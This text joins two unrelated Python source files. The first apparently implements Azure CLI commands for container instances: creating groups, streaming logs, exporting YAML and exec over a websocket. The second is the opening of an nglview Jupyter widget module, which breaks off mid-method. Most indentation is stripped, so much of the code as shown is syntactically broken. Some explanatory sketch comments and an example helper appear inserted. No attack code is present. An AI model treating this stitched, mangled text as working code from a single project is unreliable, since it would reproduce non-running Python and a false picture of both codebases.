# pylint: disable=too-few-public-methods,too-many-arguments,no-self-use,too-many-locals,line-too-long,unused-argument
import errno
try:
import msvcrt
except ImportError:
# Not supported for Linux machines.
pass
import platform
import select
import shlex
import signal
import sys
import threading
import time
try:
import termios
import tty
except ImportError:
# Not supported for Windows machines.
pass
import websocket
import yaml
from knack.log import get_logger
from knack.prompting import prompt_pass, prompt, NoTTYException
from knack.util import CLIError
from azure.mgmt.containerinstance.models import (AzureFileVolume, Container, ContainerGroup, ContainerGroupNetworkProtocol,
ContainerPort, ImageRegistryCredential, IpAddress, Port, ResourceRequests,
ResourceRequirements, Volume, VolumeMount, ContainerExecRequestTerminalSize,
GitRepoVolume, LogAnalytics, ContainerGroupDiagnostics, ContainerGroupNetworkProfile,
ContainerGroupIpAddressType)
from azure.cli.core.util import sdk_no_wait
from ._client_factory import cf_container_groups, cf_container, cf_log_analytics, cf_resource, cf_network
logger = get_logger(__name__)
WINDOWS_NAME = 'Windows'
SERVER_DELIMITER = '.'
ACR_SERVER_DELIMITER = '.azurecr.io'
AZURE_FILE_VOLUME_NAME = 'azurefile'
SECRETS_VOLUME_NAME = 'secrets'
GITREPO_VOLUME_NAME = 'gitrepo'
def list_containers(client, resource_group_name=None):
"""List all container groups in a resource group. """
if resource_group_name is None:
return client.list()
return client.list_by_resource_group(resource_group_name)
def get_container(client, resource_group_name, name):
"""Show details of a container group. """
return client.get(resource_group_name, name)
def delete_container(client, resource_group_name, name, **kwargs):
"""Delete a container group. """
return client.delete(resource_group_name, name)
# pylint: disable=too-many-statements
def create_container(cmd,
resource_group_name,
name=None,
image=None,
location=None,
cpu=1,
memory=1.5,
restart_policy='Always',
ports=None,
protocol=None,
os_type='Linux',
ip_address=None,
dns_name_label=None,
command_line=None,
environment_variables=None,
secure_environment_variables=None,
registry_login_server=None,
registry_username=None,
registry_password=None,
azure_file_volume_share_name=None,
azure_file_volume_account_name=None,
azure_file_volume_account_key=None,
azure_file_volume_mount_path=None,
log_analytics_workspace=None,
log_analytics_workspace_key=None,
vnet_name=None,
vnet_address_prefix='10.0.0.0/16',
subnet=None,
subnet_address_prefix='10.0.0.0/24',
network_profile=None,
gitrepo_url=None,
gitrepo_dir='.',
gitrepo_revision=None,
gitrepo_mount_path=None,
secrets=None,
secrets_mount_path=None,
file=None,
no_wait=False):
"""Create a container group. """
if file:
return _create_update_from_file(cmd.cli_ctx, resource_group_name, name, location, file, no_wait)
if not name:
raise CLIError("error: the --name/-n argument is required unless specified with a passed in file.")
if not image:
raise CLIError("error: the --image argument is required unless specified with a passed in file.")
ports = ports or [80]
protocol = protocol or ContainerGroupNetworkProtocol.tcp
container_resource_requirements = _create_resource_requirements(cpu=cpu, memory=memory)
image_registry_credentials = _create_image_registry_credentials(registry_login_server=registry_login_server,
registry_username=registry_username,
registry_password=registry_password,
image=image)
command = shlex.split(command_line) if command_line else None
volumes = []
mounts = []
azure_file_volume = _create_azure_file_volume(azure_file_volume_share_name=azure_file_volume_share_name,
azure_file_volume_account_name=azure_file_volume_account_name,
azure_file_volume_account_key=azure_file_volume_account_key)
azure_file_volume_mount = _create_azure_file_volume_mount(azure_file_volume=azure_file_volume,
azure_file_volume_mount_path=azure_file_volume_mount_path)
if azure_file_volume:
volumes.append(azure_file_volume)
mounts.append(azure_file_volume_mount)
secrets_volume = _create_secrets_volume(secrets)
secrets_volume_mount = _create_secrets_volume_mount(secrets_volume=secrets_volume,
secrets_mount_path=secrets_mount_path)
if secrets_volume:
volumes.append(secrets_volume)
mounts.append(secrets_volume_mount)
diagnostics = None
tags = {}
if log_analytics_workspace and log_analytics_workspace_key:
log_analytics = LogAnalytics(
workspace_id=log_analytics_workspace, workspace_key=log_analytics_workspace_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics
)
elif log_analytics_workspace and not log_analytics_workspace_key:
diagnostics, tags = _get_diagnostics_from_workspace(
cmd.cli_ctx, log_analytics_workspace)
if not diagnostics:
raise CLIError('Log Analytics workspace "' + log_analytics_workspace + '" not found.')
elif not log_analytics_workspace and log_analytics_workspace_key:
raise CLIError('"--log-analytics-workspace-key" requires "--log-analytics-workspace".')
gitrepo_volume = _create_gitrepo_volume(gitrepo_url=gitrepo_url, gitrepo_dir=gitrepo_dir, gitrepo_revision=gitrepo_revision)
gitrepo_volume_mount = _create_gitrepo_volume_mount(gitrepo_volume=gitrepo_volume, gitrepo_mount_path=gitrepo_mount_path)
if gitrepo_volume:
volumes.append(gitrepo_volume)
mounts.append(gitrepo_volume_mount)
# Concatenate secure and standard environment variables
if environment_variables and secure_environment_variables:
environment_variables = environment_variables + secure_environment_variables
else:
environment_variables = environment_variables or secure_environment_variables
# Set up VNET, subnet and network profile if needed
if subnet and vnet_name and not network_profile:
network_profile = _get_vnet_network_profile(cmd, location, resource_group_name, vnet_name, vnet_address_prefix, subnet, subnet_address_prefix)
cg_network_profile = None
if network_profile:
cg_network_profile = ContainerGroupNetworkProfile(id=network_profile)
cgroup_ip_address = _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile)
container = Container(name=name,
image=image,
resources=container_resource_requirements,
command=command,
ports=[ContainerPort(
port=p, protocol=protocol) for p in ports] if cgroup_ip_address else None,
environment_variables=environment_variables,
volume_mounts=mounts or None)
cgroup = ContainerGroup(location=location,
containers=[container],
os_type=os_type,
restart_policy=restart_policy,
ip_address=cgroup_ip_address,
image_registry_credentials=image_registry_credentials,
volumes=volumes or None,
network_profile=cg_network_profile,
diagnostics=diagnostics,
tags=tags)
container_group_client = cf_container_groups(cmd.cli_ctx)
return sdk_no_wait(no_wait, container_group_client.create_or_update, resource_group_name, name, cgroup)
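# Illustrative sketch only (not part of the original module): create_container
# above backs the `az container create` command, so a typical invocation maps
# onto its parameters roughly like this (resource names are hypothetical; the
# exact flag spellings are defined in the command's params module, not here):
#   az container create -g my-rg -n my-aci --image nginx \
#       --cpu 1 --memory 1.5 --ports 80 --dns-name-label my-aci-demo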
def _get_resource(client, resource_group_name, *subresources):
from msrestazure.azure_exceptions import CloudError
try:
resource = client.get(resource_group_name, *subresources)
return resource
except CloudError as ex:
if ex.error.error == "NotFound" or ex.error.error == "ResourceNotFound":
return None
else:
raise
def _get_vnet_network_profile(cmd, location, resource_group_name, vnet_name, vnet_address_prefix, subnet, subnet_address_prefix):
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id, is_valid_resource_id
containerInstanceDelegationServiceName = "Microsoft.ContainerInstance/containerGroups"
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
aci_delegation = Delegation(
name="Microsoft.ContainerInstance.containerGroups",
service_name="Microsoft.ContainerInstance/containerGroups"
)
ncf = cf_network(cmd.cli_ctx)
subnet_name = subnet
if is_valid_resource_id(subnet):
parsed_subnet_id = parse_resource_id(subnet)
subnet_name = parsed_subnet_id['resource_name']
vnet_name = parsed_subnet_id['name']
default_network_profile_name = "aci-network-profile-{}-{}".format(vnet_name, subnet_name)
subnet = _get_resource(ncf.subnets, resource_group_name, vnet_name, subnet_name)
# For an existing subnet, validate and add delegation if needed
if subnet:
for endpoint in (subnet.service_endpoints or []):
if endpoint.service != "Microsoft.ContainerInstance":
raise CLIError("Can not use subnet with existing service links other than 'Microsoft.ContainerInstance'.")
if not subnet.delegations:
subnet.delegations = [aci_delegation]
else:
for delegation in subnet.delegations:
if delegation.service_name != containerInstanceDelegationServiceName:
raise CLIError("Can not use subnet with existing delegations other than {}".format(containerInstanceDelegationServiceName))
network_profile = _get_resource(ncf.network_profiles, resource_group_name, default_network_profile_name)
if network_profile:
return network_profile.id
    # Create new subnet and VNet if they do not exist
else:
Subnet, VirtualNetwork, AddressSpace = cmd.get_models('Subnet', 'VirtualNetwork',
'AddressSpace', resource_type=ResourceType.MGMT_NETWORK)
vnet = _get_resource(ncf.virtual_networks, resource_group_name, vnet_name)
if not vnet:
ncf.virtual_networks.create_or_update(resource_group_name,
vnet_name,
VirtualNetwork(name=vnet_name,
location=location,
address_space=AddressSpace(address_prefixes=[vnet_address_prefix])))
subnet = Subnet(
name=subnet_name,
location=location,
address_prefix=subnet_address_prefix,
delegations=[aci_delegation])
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
NetworkProfile, ContainerNetworkInterfaceConfiguration, IPConfigurationProfile = cmd.get_models('NetworkProfile',
'ContainerNetworkInterfaceConfiguration',
'IPConfigurationProfile',
resource_type=ResourceType.MGMT_NETWORK)
# In all cases, create the network profile with aci NIC
network_profile = NetworkProfile(
name=default_network_profile_name,
location=location,
container_network_interface_configurations=[ContainerNetworkInterfaceConfiguration(
name="eth0",
ip_configurations=[IPConfigurationProfile(
name="ipconfigprofile",
subnet=subnet
)]
)]
)
network_profile = ncf.network_profiles.create_or_update(resource_group_name, default_network_profile_name, network_profile).result()
return network_profile.id
def _get_diagnostics_from_workspace(cli_ctx, log_analytics_workspace):
from msrestazure.tools import parse_resource_id
log_analytics_client = cf_log_analytics(cli_ctx)
for workspace in log_analytics_client.list():
if log_analytics_workspace == workspace.name or log_analytics_workspace == workspace.customer_id:
keys = log_analytics_client.get_shared_keys(
parse_resource_id(workspace.id)['resource_group'], workspace.name)
log_analytics = LogAnalytics(
workspace_id=workspace.customer_id, workspace_key=keys.primary_shared_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics)
return (diagnostics, {'oms-resource-link': workspace.id})
return None, {}
def _create_update_from_file(cli_ctx, resource_group_name, name, location, file, no_wait):
resource_client = cf_resource(cli_ctx)
container_group_client = cf_container_groups(cli_ctx)
    cg_definition = None
try:
with open(file, 'r') as f:
            cg_definition = yaml.safe_load(f)
except FileNotFoundError:
raise CLIError("No such file or directory: " + file)
except yaml.YAMLError as e:
raise CLIError("Error while parsing yaml file:\n\n" + str(e))
# Validate names match if both are provided
    if name and cg_definition.get('name', None):
        if name != cg_definition.get('name', None):
            raise CLIError("The name parameter and name from yaml definition must match.")
    else:
        # Validate at least one name is provided
        name = name or cg_definition.get('name', None)
        if cg_definition.get('name', None) is None and not name:
            raise CLIError("The name of the container group is required")
    cg_definition['name'] = name
    location = location or cg_definition.get('location', None)
    if not location:
        location = resource_client.resource_groups.get(resource_group_name).location
    cg_definition['location'] = location
    api_version = cg_definition.get('apiVersion', None) or container_group_client.api_version
    return sdk_no_wait(no_wait,
                       resource_client.resources.create_or_update,
                       resource_group_name,
                       "Microsoft.ContainerInstance",
                       '',
                       "containerGroups",
                       name,
                       api_version,
                       cg_definition)
# pylint: disable=inconsistent-return-statements
def _create_resource_requirements(cpu, memory):
"""Create resource requirements. """
if cpu or memory:
container_resource_requests = ResourceRequests(memory_in_gb=memory, cpu=cpu)
return ResourceRequirements(requests=container_resource_requests)
def _create_image_registry_credentials(registry_login_server, registry_username, registry_password, image):
"""Create image registry credentials. """
image_registry_credentials = None
if registry_login_server:
if not registry_username:
raise CLIError('Please specify --registry-username in order to use custom image registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use custom image registry.')
image_registry_credentials = [ImageRegistryCredential(server=registry_login_server,
username=registry_username,
password=registry_password)]
elif ACR_SERVER_DELIMITER in image.split("/")[0]:
if not registry_username:
try:
registry_username = prompt(msg='Image registry username: ')
except NoTTYException:
raise CLIError('Please specify --registry-username in order to use Azure Container Registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use Azure Container Registry.')
acr_server = image.split("/")[0] if image.split("/") else None
if acr_server:
image_registry_credentials = [ImageRegistryCredential(server=acr_server,
username=registry_username,
password=registry_password)]
elif registry_username and registry_password and SERVER_DELIMITER in image.split("/")[0]:
login_server = image.split("/")[0] if image.split("/") else None
if login_server:
image_registry_credentials = [ImageRegistryCredential(server=login_server,
username=registry_username,
password=registry_password)]
else:
raise CLIError('Failed to parse login server from image name; please explicitly specify --registry-server.')
return image_registry_credentials
def _create_azure_file_volume(azure_file_volume_share_name, azure_file_volume_account_name, azure_file_volume_account_key):
"""Create Azure File volume. """
azure_file_volume = None
if azure_file_volume_share_name:
if not azure_file_volume_account_name:
raise CLIError('Please specify --azure-file-volume-account-name in order to use Azure File volume.')
if not azure_file_volume_account_key:
try:
azure_file_volume_account_key = prompt_pass(msg='Azure File storage account key: ')
except NoTTYException:
raise CLIError('Please specify --azure-file-volume-account-key in order to use Azure File volume.')
azure_file_volume = AzureFileVolume(share_name=azure_file_volume_share_name,
storage_account_name=azure_file_volume_account_name,
storage_account_key=azure_file_volume_account_key)
return Volume(name=AZURE_FILE_VOLUME_NAME, azure_file=azure_file_volume) if azure_file_volume else None
def _create_secrets_volume(secrets):
"""Create secrets volume. """
return Volume(name=SECRETS_VOLUME_NAME, secret=secrets) if secrets else None
def _create_gitrepo_volume(gitrepo_url, gitrepo_dir, gitrepo_revision):
"""Create Git Repo volume. """
gitrepo_volume = GitRepoVolume(repository=gitrepo_url, directory=gitrepo_dir, revision=gitrepo_revision)
return Volume(name=GITREPO_VOLUME_NAME, git_repo=gitrepo_volume) if gitrepo_url else None
# pylint: disable=inconsistent-return-statements
def _create_azure_file_volume_mount(azure_file_volume, azure_file_volume_mount_path):
"""Create Azure File volume mount. """
if azure_file_volume_mount_path:
if not azure_file_volume:
raise CLIError('Please specify --azure-file-volume-share-name --azure-file-volume-account-name --azure-file-volume-account-key '
'to enable Azure File volume mount.')
return VolumeMount(name=AZURE_FILE_VOLUME_NAME, mount_path=azure_file_volume_mount_path)
def _create_secrets_volume_mount(secrets_volume, secrets_mount_path):
"""Create secrets volume mount. """
if secrets_volume:
if not secrets_mount_path:
raise CLIError('Please specify --secrets --secrets-mount-path '
'to enable secrets volume mount.')
return VolumeMount(name=SECRETS_VOLUME_NAME, mount_path=secrets_mount_path)
def _create_gitrepo_volume_mount(gitrepo_volume, gitrepo_mount_path):
"""Create Git Repo volume mount. """
if gitrepo_mount_path:
if not gitrepo_volume:
raise CLIError('Please specify --gitrepo-url (--gitrepo-dir --gitrepo-revision) '
'to enable Git Repo volume mount.')
return VolumeMount(name=GITREPO_VOLUME_NAME, mount_path=gitrepo_mount_path)
# pylint: disable=inconsistent-return-statements
def _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile):
"""Create IP address. """
if (ip_address and ip_address.lower() == 'public') or dns_name_label:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
dns_name_label=dns_name_label, type=ContainerGroupIpAddressType.public)
elif network_profile:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
type=ContainerGroupIpAddressType.private)
# pylint: disable=inconsistent-return-statements
def container_logs(cmd, resource_group_name, name, container_name=None, follow=False):
"""Tail a container instance log. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
if not follow:
log = container_client.list_logs(resource_group_name, name, container_name)
print(log.content)
else:
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
            shutdown_grace_period=5,
stream_target=_stream_logs,
stream_args=(container_client, resource_group_name, name, container_name, container_group.restart_policy))
def container_export(cmd, resource_group_name, name, file):
resource_client = cf_resource(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
resource = resource_client.resources.get(resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
container_group_client.api_version,
False).__dict__
    # Remove unwanted properties
resource['properties'].pop('instanceView', None)
resource.pop('sku', None)
resource.pop('id', None)
resource.pop('plan', None)
resource.pop('identity', None)
resource.pop('kind', None)
resource.pop('managed_by', None)
resource['properties'].pop('provisioningState', None)
for i in range(len(resource['properties']['containers'])):
resource['properties']['containers'][i]['properties'].pop('instanceView', None)
# Add the api version
resource['apiVersion'] = container_group_client.api_version
with open(file, 'w+') as f:
yaml.dump(resource, f, default_flow_style=False)
def container_exec(cmd, resource_group_name, name, exec_command, container_name=None, terminal_row_size=20, terminal_col_size=80):
"""Start exec for a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
    if container_name or (container_name is None and len(container_group.containers) == 1):
# If only one container in container group, use that container.
if container_name is None:
container_name = container_group.containers[0].name
terminal_size = ContainerExecRequestTerminalSize(rows=terminal_row_size, cols=terminal_col_size)
execContainerResponse = container_client.execute_command(resource_group_name, name, container_name, exec_command, terminal_size)
        if platform.system() == WINDOWS_NAME:
_start_exec_pipe_win(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
_start_exec_pipe(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
raise CLIError('--container-name required when container group has more than one container.')
def _start_exec_pipe_win(web_socket_uri, password):
def _on_ws_open(ws):
ws.send(password)
t = threading.Thread(target=_capture_stdin, args=[ws])
t.daemon = True
t.start()
ws = websocket.WebSocketApp(web_socket_uri, on_open=_on_ws_open, on_message=_on_ws_msg)
ws.run_forever()
def _on_ws_msg(ws, msg):
sys.stdout.write(msg)
sys.stdout.flush()
def _capture_stdin(ws):
while True:
        if msvcrt.kbhit():
x = msvcrt.getch()
ws.send(x)
def _start_exec_pipe(web_socket_uri, password):
ws = websocket.create_connection(web_socket_uri)
oldtty = termios.tcgetattr(sys.stdin)
old_handler = signal.getsignal(signal.SIGWINCH)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
ws.send(password)
while True:
try:
if not _cycle_exec_pipe(ws):
break
except (select.error, IOError) as e:
if e.args and e.args[0] == errno.EINTR:
pass
else:
raise
except websocket.WebSocketException:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
signal.signal(signal.SIGWINCH, old_handler)
def _cycle_exec_pipe(ws):
r, _, _ = select.select([ws.sock, sys.stdin], [], [])
if ws.sock in r:
data = ws.recv()
if not data:
return False
sys.stdout.write(data)
sys.stdout.flush()
if sys.stdin in r:
x = sys.stdin.read(1)
if not x:
return True
ws.send(x)
return True
def attach_to_container(cmd, resource_group_name, name, container_name=None):
"""Attach to a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
        shutdown_grace_period=5,
stream_target=_stream_container_events_and_logs,
stream_args=(container_group_client, container_client, resource_group_name, name, container_name))
def _start_streaming(terminate_condition, terminate_condition_args, shutdown_grace_period, stream_target, stream_args):
"""Start streaming for the stream target. """
import colorama
colorama.init()
try:
t = threading.Thread(target=stream_target, args=stream_args)
t.daemon = True
t.start()
while not terminate_condition(*terminate_condition_args) and t.is_alive():
time.sleep(10)
        time.sleep(shutdown_grace_period)
finally:
colorama.deinit()
def _stream_logs(client, resource_group_name, name, container_name, restart_policy):
"""Stream logs for a container. """
lastOutputLines = 0
while True:
log = client.list_logs(resource_group_name, name, container_name)
lines = log.content.split('\n')
currentOutputLines = len(lines)
# Should only happen when the container restarts.
if currentOutputLines < lastOutputLines and restart_policy != 'Never':
print("Warning: you're having '--restart-policy={}'; the container '{}' was just restarted; the tail of the current log might be missing. Exiting...".format(restart_policy, container_name))
break
_move_console_cursor_up(lastOutputLines)
print(log.content)
lastOutputLines = currentOutputLines
time.sleep(2)
def _stream_container_events_and_logs(container_group_client, container_client, resource_group_name, name, container_name):
"""Stream container events and logs. """
lastOutputLines = 0
lastContainerState = None
while True:
container_group, container = _find_container(container_group_client, resource_group_name, name, container_name)
container_state = 'Unknown'
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state:
container_state = container.instance_view.current_state.state
_move_console_cursor_up(lastOutputLines)
if container_state != lastContainerState:
print("Container '{}' is in state '{}'...".format(container_name, container_state))
currentOutputLines = 0
if container.instance_view and container.instance_view.events:
for event in sorted(container.instance_view.events, key=lambda e: e.last_timestamp):
print('(count: {}) (last timestamp: {}) {}'.format(event.count, event.last_timestamp, event.message))
currentOutputLines += 1
lastOutputLines = currentOutputLines
lastContainerState = container_state
if container_state == 'Running':
print('\nStart streaming logs:')
break
time.sleep(2)
_stream_logs(container_client, resource_group_name, name, container_name, container_group.restart_policy)
def _is_container_terminated(client, resource_group_name, name, container_name):
"""Check if a container should be considered terminated. """
container_group, container = _find_container(client, resource_group_name, name, container_name)
# If a container group is terminated, assume the container is also terminated.
if container_group.instance_view and container_group.instance_view.state:
if container_group.instance_view.state == 'Succeeded' or container_group.instance_view.state == 'Failed':
return True
# If the restart policy is Always, assume the container will be restarted.
if container_group.restart_policy:
if container_group.restart_policy == 'Always':
return False
# Only assume the container is terminated if its state is Terminated.
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state == 'Terminated':
return True
return False
def _find_container(client, resource_group_name, name, container_name):
"""Find a container in a container group. """
container_group = client.get(resource_group_name, name)
containers = [c for c in container_group.containers if c.name == container_name]
if len(containers) != 1:
raise CLIError("Found 0 or more than 1 container with name '{}'".format(container_name))
return container_group, containers[0]
def _move_console_cursor_up(lines):
"""Move console cursor up. """
if lines > 0:
# Use stdout.write to support Python 2
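        # ANSI escape sequences: '\033[{n}A' moves the cursor up n lines,
        # '\033[K' erases to the end of the line and '\033[J' erases to the
        # end of the screen, so each new log snapshot overwrites the previous one.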
sys.stdout.write('\033[{}A\033[K\033[J'.format(lines))
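

# --- Illustrative sketch (not part of the command module) ---------------------
# A minimal, hedged example of how the helpers above are typically wired
# together. The function name `_example_stream_container` is hypothetical; the
# client objects are assumed to be already-authenticated SDK clients.
def _example_stream_container(container_group_client, container_client,
                              resource_group_name, name, container_name):
    # Tail events and logs on a daemon thread until the container terminates
    # (or indefinitely if the restart policy keeps it alive).
    _start_streaming(
        terminate_condition=_is_container_terminated,
        terminate_condition_args=(container_group_client, resource_group_name,
                                  name, container_name),
        shutdown_grace_period=5,
        stream_target=_stream_container_events_and_logs,
        stream_args=(container_group_client, container_client,
                     resource_group_name, name, container_name))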
|
widget.py
|
import base64
import json
import logging
import threading
import time
import uuid
import ipywidgets as widgets
import ipywidgets.embed
import numpy as np
from IPython.display import display
from ipywidgets import (Image, Box, DOMWidget, HBox, VBox, IntSlider, Output, Play, Widget,
jslink)
from ipywidgets import widget as _widget
from traitlets import (Bool, CaselessStrEnum, Dict, Instance, Int, Integer,
List, Unicode, observe, validate)
import traitlets
from . import color, interpolate
from .adaptor import Structure, Trajectory
from .component import ComponentViewer
from .config import BACKENDS
from .player import TrajectoryPlayer, _dry_run
from .remote_thread import RemoteCallThread
from .representation import RepresentationControl
from .shape import Shape
from .stage import Stage
from .utils import py_utils, widget_utils
from .utils.py_utils import (FileManager, _camelize_dict, _update_url,
encode_base64, get_repr_names_from_dict,
seq_to_string)
from .viewer_control import ViewerControl
from ._frontend import __frontend_version__
from .base import BaseWidget
widget_serialization = _widget.widget_serialization
__all__ = ['NGLWidget', 'ComponentViewer']
_EXCLUDED_CALLBACK_AFTER_FIRING = {
'setUnSyncCamera',
'setSelector',
'setDelay',
'autoView',
'_downloadImage',
'_exportImage',
'set_representation_from_backend',
}
def _deprecated(msg):
def wrap_1(func):
def wrap_2(*args, **kwargs):
            logging.warning(msg)
return func(*args, **kwargs)
return wrap_2
return wrap_1
def write_html(fp, views, frame_range=None):
# type: (str, List[NGLWidget]) -> None
"""EXPERIMENTAL. Likely will be changed.
Make html file to display a list of views. For further options, please
check `ipywidgets.embed` module.
Parameters
----------
fp : str or file handle
views : a DOMWidget view or a list of views.
frame_range : None or a tuple of int
Examples
--------
>>> import nglview
>>> view = nglview.show_pdbid('1tsu')
>>> view # doctest: +SKIP
>>> nglview.write_html('index.html', [view]) # doctest: +SKIP
>>> nglview.write_html('index.html', [view], frame_range=(0, 5)) # doctest: +SKIP
"""
    views = [views] if isinstance(views, DOMWidget) else views
embed = ipywidgets.embed
color = None
theme = None
for k, v in views[0].widgets.items():
if v.__class__.__name__ == '_ColormakerRegistry':
color = v
if v.__class__.__name__ == 'ThemeManager':
theme = v
for v in [color, theme]:
v and views.insert(0, v)
def _set_serialization(views):
for view in views:
if hasattr(view, '_set_serialization'):
view._set_serialization(frame_range=frame_range)
elif isinstance(view, Box):
_set_serialization(view.children)
def _unset_serialization(views):
for view in views:
if hasattr(view, '_unset_serialization'):
view._unset_serialization()
elif isinstance(view, Box):
_unset_serialization(view.children)
_set_serialization(views)
# FIXME: allow add jquery-ui link?
snippet = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.css">\n'
snippet += embed.embed_snippet(views)
html_code = embed.html_template.format(title='nglview-demo',
snippet=snippet)
# from ipywidgets
# Check if fp is writable:
if hasattr(fp, 'write'):
fp.write(html_code)
else:
# Assume fp is a filename:
with open(fp, "w") as f:
f.write(html_code)
_unset_serialization(views)
class NGLWidget(DOMWidget):
_view_name = Unicode("NGLView").tag(sync=True)
_view_module = Unicode("nglview-js-widgets").tag(sync=True)
_view_module_version = Unicode(__frontend_version__).tag(sync=True)
_model_name = Unicode("NGLModel").tag(sync=True)
_model_module = Unicode("nglview-js-widgets").tag(sync=True)
_model_module_version = Unicode(__frontend_version__).tag(sync=True)
_ngl_version = Unicode().tag(sync=True)
# _model_name = Unicode("NGLView").tag(sync=True)
# _model_module = Unicode("nglview-js-widgets").tag(sync=True)
_image_data = Unicode().tag(sync=False)
# use Integer here, because mdtraj uses a long datatype here on Python-2.7
frame = Integer().tag(sync=True)
max_frame = Int(0).tag(sync=True)
background = Unicode('white').tag(sync=True)
loaded = Bool(False).tag(sync=False)
picked = Dict().tag(sync=True)
n_components = Int(0).tag(sync=True)
_view_width = Unicode().tag(sync=True) # px
_view_height = Unicode().tag(sync=True) # px
_scene_position = Dict().tag(sync=True)
_scene_rotation = Dict().tag(sync=True)
# hack to always display movie
# TODO: remove _parameters?
_parameters = Dict().tag(sync=False)
_ngl_full_stage_parameters = Dict().tag(sync=True)
_ngl_original_stage_parameters = Dict().tag(sync=True)
_coordinates_dict = Dict().tag(sync=False)
_camera_str = CaselessStrEnum(['perspective', 'orthographic'],
default_value='orthographic').tag(sync=True)
_camera_orientation = List().tag(sync=True)
_synced_model_ids = List().tag(sync=True)
_synced_repr_model_ids = List().tag(sync=True)
_ngl_view_id = List().tag(sync=True)
_ngl_repr_dict = Dict().tag(sync=True)
_ngl_component_ids = List().tag(sync=False)
_ngl_component_names = List().tag(sync=False)
_ngl_msg = None
_send_binary = Bool(True).tag(sync=False)
_init_gui = Bool(False).tag(sync=False)
gui_style = CaselessStrEnum(['ngl'], allow_none=True).tag(sync=True)
_gui_theme = CaselessStrEnum(['dark', 'light'], allow_none=True).tag(sync=True)
_widget_theme = None
_ngl_serialize = Bool(False).tag(sync=True)
_ngl_msg_archive = List().tag(sync=True)
_ngl_coordinate_resource = Dict().tag(sync=True)
_representations = List().tag(sync=False)
_ngl_color_dict = Dict().tag(sync=True)
_player_dict = Dict().tag(sync=True)
# instance
_iplayer = Instance(widgets.Box,
allow_none=True).tag(sync=True, **widget_serialization)
_igui = Instance(widgets.Tab,
allow_none=True).tag(sync=True, **widget_serialization)
_ibtn_fullscreen = Instance(widgets.Button,
allow_none=True).tag(sync=True, **widget_serialization)
def __init__(self,
structure=None,
representations=None,
parameters=None,
**kwargs):
super().__init__(**kwargs)
self._gui = None
self._init_gui = kwargs.pop('gui', False)
self._theme = kwargs.pop('theme', 'default')
self._widget_image = Image()
self._widget_image.width = 900.
self._image_array = []
# do not use _displayed_callbacks since there is another Widget._display_callbacks
self._event = threading.Event()
self._ngl_displayed_callbacks_before_loaded = []
widget_utils._add_repr_method_shortcut(self, self)
self.shape = Shape(view=self)
self.stage = Stage(view=self)
self.control = ViewerControl(view=self)
self._handle_msg_thread = threading.Thread(
target=self.on_msg, args=(self._ngl_handle_msg, ))
# # register to get data from JS side
self._handle_msg_thread.daemon = True
self._handle_msg_thread.start()
self._remote_call_thread = RemoteCallThread(
self,
registered_funcs=['loadFile', 'replaceStructure', '_exportImage'])
self._remote_call_thread.start()
self._trajlist = []
self._ngl_component_ids = []
if representations:
# Must be set here before calling
            # add_trajectory or add_structure
# After finish adding new Structure/Trajectory,
# initial representations will be set.
kwargs['default_representation'] = False
else:
if 'default' in kwargs:
kwargs['default_representation'] = kwargs['default']
autoview = 'center' not in kwargs or ('center' in kwargs
and kwargs.pop('center'))
# NOTE: Using `pop` to avoid passing `center` to NGL.
if parameters:
self.parameters = parameters
if isinstance(structure, Trajectory):
name = py_utils.get_name(structure, kwargs)
self.add_trajectory(structure, name=name, **kwargs)
elif isinstance(structure, (list, tuple)):
trajectories = structure
for trajectory in trajectories:
name = py_utils.get_name(trajectory, kwargs)
self.add_trajectory(trajectory, name=name, **kwargs)
else:
if structure is not None:
self.add_structure(structure, **kwargs)
if representations:
# If initial representations are provided,
# we need to set defaultRepresentation to False
self.representations = representations
if autoview:
self.center()
self.player = TrajectoryPlayer(self)
self._view_width = kwargs.get('width', '')
self._view_height = kwargs.get('height', '')
        # Updating only self.layout.{width, height} doesn't handle
        # resizing the NGL widget properly.
self._sync_with_layout()
self._create_player()
self._create_ibtn_fullscreen()
def _create_ibtn_fullscreen(self):
button = widgets.Button(icon='compress')
button.layout.width = '34px'
# onclick is implemented in frontend
self._ibtn_fullscreen = button
def _sync_with_layout(self):
def on_change_layout(change):
new = change['new']
if change['name'] == 'width':
self._set_size(new, '')
elif change['name'] == 'height':
self._set_size('', new)
self.layout.observe(on_change_layout, ['width', 'height'])
def _set_serialization(self, frame_range=None):
